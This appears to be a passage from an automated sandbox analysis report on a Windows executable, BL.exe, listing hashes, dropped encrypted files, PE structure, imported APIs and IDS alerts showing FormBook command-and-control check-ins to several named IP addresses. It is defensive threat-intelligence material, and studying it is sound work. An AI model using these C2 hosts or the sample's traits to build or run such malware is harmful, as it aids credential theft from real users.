                                                                                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                          MD5:271D5F995996735B01672CF227C81C17
                                                                                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                          Malicious:false
                                                                                                                          Reputation:high, very likely benign file
                                                                                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\fricandeaux

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\BL.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):286208
                                                                                                                          Entropy (8bit):7.9939513049870135
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:6144:Byd8qhsSgIVBOW+uhTsqQC0AC+i2UUig4Xd0AbcSj8rW7LGdj:s8wsSRBGuhTjQC0CGUHqCj
                                                                                                                          MD5:9B849D9422829AB24EF3A402601B7688
                                                                                                                          SHA1:D48D87FDE9A9050896BC180B1428A465488E8ABE
                                                                                                                          SHA-256:BAD93C2A209715DA11A406D2EEE3AA9701AE5B617FE34FB86186F49B7E7FB66F
                                                                                                                          SHA-512:5B46C7E0A3DE16A2358530DA3077058D44D21E9DE551BB5FD25051D2A15324717D7ECD9047D3E893391AC64D494E2BDA1D11120FE8758762CEF6D638187A5F9B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.ir..X8XGa.._.....CR...o:_..R7D37CQX8XG9W5VXR7D37CQX8XG9W5.XR7J,.MQ.1.f.Vy.y._-@.3#7_*&TwV76<X0.U&q*M6gP9.....)\S&.U5Rc9W5VXR7=2>.l8_.zY0.k85.^...k8_.]...j85.^...m8_..P4]k85.D37CQX8X.|W5.YS7#..!QX8XG9W5.XP6O2<CQ.<XG9W5VXR7. 7CQH8XGYS5VX.7D#7CQZ8XA9W5VXR7B37CQX8XGYS5VZR7D37CSXx.G9G5VHR7D3'CQH8XG9W5FXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7jGR;%X8X.sS5VHR7D.3CQH8XG9W5VXR7D37CqX88G9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8X

                                                                                                                          Static File Info

                                                                                                                          General

                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Entropy (8bit):7.503718460836846
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                                                                          • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                          File name:BL.exe
                                                                                                                          File size:1'313'649 bytes
                                                                                                                          MD5:0084fa11e77425fd332e10928312f760
                                                                                                                          SHA1:33de149315ca65380f3f4f39ac3dcb85e36f588d
                                                                                                                          SHA256:0d76a185c479321a6eb599b67de8126eb81d5e3f8a1b9d93c0abaeeef9c89e40
                                                                                                                          SHA512:a2feb26fd7028bfb40bb9872a261cbf95cd115406884e20dab5f4cfde98a15bb1bb966bc83f3871f27a80175db0274b1515863b0cd7873bd7ffa7f0cfb18c65b
                                                                                                                          SSDEEP:24576:ffmMv6Ckr7Mny5QL12pDAmpU4cY5Ww+tbFCxwya2ykBHsERupNY:f3v+7/5QLQp8wZ5b+zCTh5BLRuo
                                                                                                                          TLSH:7855F212F3D680B6E9A338712937E32AEB3575194327C4CBA7E42F768E111419B3B761
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........

                                                                                                                          File Icon

                                                                                                                          Icon Hash:1733312925935517

                                                                                                                          Static PE Info

                                                                                                                          General

                                                                                                                          Entrypoint:0x416310
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:5
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:5
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:5
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:aaaa8913c89c8aa4a5d93f06853894da

                                                                                                                          Entrypoint Preview

                                                                                                                          Instruction
                                                                                                                          call 00007FB2CCBE1DACh
                                                                                                                          jmp 00007FB2CCBD5B7Eh
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          push ebp
                                                                                                                          mov ebp, esp
                                                                                                                          push edi
                                                                                                                          push esi
                                                                                                                          mov esi, dword ptr [ebp+0Ch]
                                                                                                                          mov ecx, dword ptr [ebp+10h]
                                                                                                                          mov edi, dword ptr [ebp+08h]
                                                                                                                          mov eax, ecx
                                                                                                                          mov edx, ecx
                                                                                                                          add eax, esi
                                                                                                                          cmp edi, esi
                                                                                                                          jbe 00007FB2CCBD5D0Ah
                                                                                                                          cmp edi, eax
                                                                                                                          jc 00007FB2CCBD5EAAh
                                                                                                                          cmp ecx, 00000100h
                                                                                                                          jc 00007FB2CCBD5D21h
                                                                                                                          cmp dword ptr [004A94E0h], 00000000h
                                                                                                                          je 00007FB2CCBD5D18h
                                                                                                                          push edi
                                                                                                                          push esi
                                                                                                                          and edi, 0Fh
                                                                                                                          and esi, 0Fh
                                                                                                                          cmp edi, esi
                                                                                                                          pop esi
                                                                                                                          pop edi
                                                                                                                          jne 00007FB2CCBD5D0Ah
                                                                                                                          pop esi
                                                                                                                          pop edi
                                                                                                                          pop ebp
                                                                                                                          jmp 00007FB2CCBD616Ah
                                                                                                                          test edi, 00000003h
                                                                                                                          jne 00007FB2CCBD5D17h
                                                                                                                          shr ecx, 02h
                                                                                                                          and edx, 03h
                                                                                                                          cmp ecx, 08h
                                                                                                                          jc 00007FB2CCBD5D2Ch
                                                                                                                          rep movsd
                                                                                                                          jmp dword ptr [00416494h+edx*4]
                                                                                                                          nop
                                                                                                                          mov eax, edi
                                                                                                                          mov edx, 00000003h
                                                                                                                          sub ecx, 04h
                                                                                                                          jc 00007FB2CCBD5D0Eh
                                                                                                                          and eax, 03h
                                                                                                                          add ecx, eax
                                                                                                                          jmp dword ptr [004163A8h+eax*4]
                                                                                                                          jmp dword ptr [004164A4h+ecx*4]
                                                                                                                          nop
                                                                                                                          jmp dword ptr [00416428h+ecx*4]
                                                                                                                          nop
                                                                                                                          mov eax, E4004163h
                                                                                                                          arpl word ptr [ecx+00h], ax
                                                                                                                          or byte ptr [ecx+eax*2+00h], ah
                                                                                                                          and edx, ecx
                                                                                                                          mov al, byte ptr [esi]
                                                                                                                          mov byte ptr [edi], al
                                                                                                                          mov al, byte ptr [esi+01h]
                                                                                                                          mov byte ptr [edi+01h], al
                                                                                                                          mov al, byte ptr [esi+02h]
                                                                                                                          shr ecx, 02h
                                                                                                                          mov byte ptr [edi+02h], al
                                                                                                                          add esi, 03h
                                                                                                                          add edi, 03h
                                                                                                                          cmp ecx, 08h
                                                                                                                          jc 00007FB2CCBD5CCEh

                                                                                                                          Rich Headers

                                                                                                                          Programming Language:
                                                                                                                          • [ASM] VS2008 SP1 build 30729
                                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                                          • [C++] VS2008 SP1 build 30729
                                                                                                                          • [ C ] VS2005 build 50727
                                                                                                                          • [IMP] VS2005 build 50727
                                                                                                                          • [ASM] VS2008 build 21022
                                                                                                                          • [RES] VS2008 build 21022
                                                                                                                          • [LNK] VS2008 SP1 build 30729

                                                                                                                          Data Directories

                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x8cd3c0x154.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9298.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x820000x840.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                          Sections

                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x10000x800170x802006c20c6bf686768b6f134f5bd508171bcFalse0.5602991615853659data6.634688230255595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                          .rdata0x820000xd95c0xda00f979966509a93083729d23cdfd2a6f2dFalse0.36256450688073394data4.880040824124099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .data0x900000x1a5180x6800e5d77411f751d28c6eee48a743606795False0.1600060096153846data2.2017649896261107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .rsrc0xab0000x92980x9400f6be76de0ef2c68f397158bf01bdef3eFalse0.4896801097972973data5.530303089784181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                          Resources

                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                          RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                          RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                          RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                          RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                                          RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                                          RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                                          RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                                                          RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                                                          RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                                          RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                                          RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                                          RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                                          RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                                          RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                                          RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                                          RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                                          RT_STRING0xb28380x43adataEnglishGreat Britain0.3733826247689464
                                                                                                                          RT_STRING0xb2c780x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                          RT_STRING0xb32780x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                          RT_STRING0xb38d80x388dataEnglishGreat Britain0.377212389380531
                                                                                                                          RT_STRING0xb3c600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                                          RT_GROUP_ICON0xb3db80x84dataEnglishGreat Britain0.6439393939393939
                                                                                                                          RT_GROUP_ICON0xb3e400x14dataEnglishGreat Britain1.15
                                                                                                                          RT_GROUP_ICON0xb3e580x14dataEnglishGreat Britain1.25
                                                                                                                          RT_GROUP_ICON0xb3e700x14dataEnglishGreat Britain1.25
                                                                                                                          RT_VERSION0xb3e880x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                                          RT_MANIFEST0xb40280x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                                                          Imports

                                                                                                                          DLLImport
                                                                                                                          WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                          VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                          COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                          MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                          WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                          PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                          USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                          KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
                                                                                                                          USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
                                                                                                                          GDI32.dllDeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
                                                                                                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                          ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
                                                                                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                          ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
                                                                                                                          OLEAUT32.dllSafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData

                                                                                                                          Possible Origin

                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                          EnglishGreat Britain
                                                                                                                          EnglishUnited States

                                                                                                                          Network Behavior

                                                                                                                          Suricata IDS Alerts

                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                          2024-10-21T17:24:45.946908+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649930188.114.96.380TCP
                                                                                                                          2024-10-21T17:25:06.652560+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64998852.13.151.17980TCP
                                                                                                                          2024-10-21T17:25:09.193625+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999252.13.151.17980TCP
                                                                                                                          2024-10-21T17:25:11.755140+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999352.13.151.17980TCP
                                                                                                                          2024-10-21T17:25:14.287533+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64999452.13.151.17980TCP
                                                                                                                          2024-10-21T17:25:28.750060+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649995103.106.67.11280TCP
                                                                                                                          2024-10-21T17:25:31.062664+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649998103.106.67.11280TCP
                                                                                                                          2024-10-21T17:25:33.625032+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649999103.106.67.11280TCP
                                                                                                                          2024-10-21T17:25:36.374955+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650000103.106.67.11280TCP
                                                                                                                          2024-10-21T17:25:41.936045+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650001188.114.96.380TCP
                                                                                                                          2024-10-21T17:25:44.510712+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650002188.114.96.380TCP
                                                                                                                          2024-10-21T17:25:47.065312+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650003188.114.96.380TCP
                                                                                                                          2024-10-21T17:25:49.591455+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650004188.114.96.380TCP
                                                                                                                          2024-10-21T17:25:55.058197+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500053.33.130.19080TCP
                                                                                                                          2024-10-21T17:25:57.616175+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500083.33.130.19080TCP
                                                                                                                          2024-10-21T17:26:01.277397+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500093.33.130.19080TCP
                                                                                                                          2024-10-21T17:26:04.855339+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6500103.33.130.19080TCP
                                                                                                                          2024-10-21T17:26:11.219341+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657327217.70.184.5080TCP
                                                                                                                          2024-10-21T17:26:13.751070+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657328217.70.184.5080TCP
                                                                                                                          2024-10-21T17:26:16.328131+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657329217.70.184.5080TCP
                                                                                                                          2024-10-21T17:26:18.811054+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.657330217.70.184.5080TCP
                                                                                                                          2024-10-21T17:26:24.623720+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65733394.23.162.16380TCP
                                                                                                                          2024-10-21T17:26:27.162255+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65733494.23.162.16380TCP
                                                                                                                          2024-10-21T17:26:29.632875+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65733594.23.162.16380TCP
                                                                                                                          2024-10-21T17:26:32.177100+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65733694.23.162.16380TCP
                                                                                                                          2024-10-21T17:26:38.750093+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657337103.224.182.24280TCP
                                                                                                                          2024-10-21T17:26:41.296892+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657338103.224.182.24280TCP
                                                                                                                          2024-10-21T17:26:43.843746+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.657339103.224.182.24280TCP
